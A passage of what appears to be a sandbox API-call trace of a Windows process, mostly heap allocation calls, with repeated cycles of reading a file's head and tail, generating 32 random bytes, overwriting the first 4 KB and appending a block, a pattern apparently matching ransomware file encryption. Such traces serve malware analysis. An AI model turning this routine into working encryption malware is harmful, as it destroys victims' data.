GetProcessHeap () returned 0x4f10000 [0077.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0077.075] GetProcessHeap () returned 0x4f10000 [0077.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.076] GetProcessHeap () returned 0x4f10000 [0077.076] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.077] GetProcessHeap () returned 0x4f10000 [0077.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0077.078] SetFilePointerEx (in: hFile=0x794, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.078] WriteFile (in: hFile=0x794, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0077.078] WriteFile (in: hFile=0x794, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0077.078] GetProcessHeap () returned 0x4f10000 [0077.078] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0077.078] GetProcessHeap () returned 0x4f10000 [0077.078] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0077.078] GetProcessHeap () returned 0x4f10000 [0077.078] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0077.078] CloseHandle (hObject=0x794) returned 1 [0077.079] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 17 [0077.079] SetFilePointerEx (in: hFile=0x790, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.079] ReadFile (in: hFile=0x790, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.079] SetFilePointerEx (in: hFile=0x790, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.079] GetProcessHeap () returned 0x4f10000 [0077.080] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.080] GetProcessHeap () returned 0x4f10000 [0077.080] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.080] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.080] GetProcessHeap () returned 0x4f10000 [0077.080] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.080] ReadFile (in: hFile=0x790, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.148] SetFilePointerEx (in: hFile=0x790, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.149] WriteFile (in: hFile=0x790, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.149] GetProcessHeap () returned 0x4f10000 [0077.149] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.150] GetProcessHeap () returned 0x4f10000 [0077.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bbc8 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bbc8 | out: hHeap=0x4f10000) returned 1 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.151] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.151] GetProcessHeap () returned 0x4f10000 [0077.152] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.152] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.152] GetProcessHeap () returned 0x4f10000 [0077.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.153] GetProcessHeap () returned 0x4f10000 [0077.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0077.153] SetFilePointerEx (in: hFile=0x790, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.153] WriteFile (in: hFile=0x790, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0077.154] WriteFile (in: hFile=0x790, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0077.154] GetProcessHeap () returned 0x4f10000 [0077.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0077.154] GetProcessHeap () returned 0x4f10000 [0077.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0077.154] GetProcessHeap () returned 0x4f10000 [0077.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0077.154] CloseHandle (hObject=0x790) returned 1 [0077.155] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 18 [0077.155] SetFilePointerEx (in: hFile=0x784, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.155] ReadFile (in: hFile=0x784, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.155] SetFilePointerEx (in: hFile=0x784, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.155] GetProcessHeap () returned 0x4f10000 [0077.155] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.155] GetProcessHeap () returned 0x4f10000 [0077.155] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.155] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.156] GetProcessHeap () returned 0x4f10000 [0077.156] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.156] ReadFile (in: hFile=0x784, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.206] SetFilePointerEx (in: hFile=0x784, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.206] WriteFile (in: hFile=0x784, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.206] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.206] GetProcessHeap () returned 0x4f10000 [0077.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.207] GetProcessHeap () returned 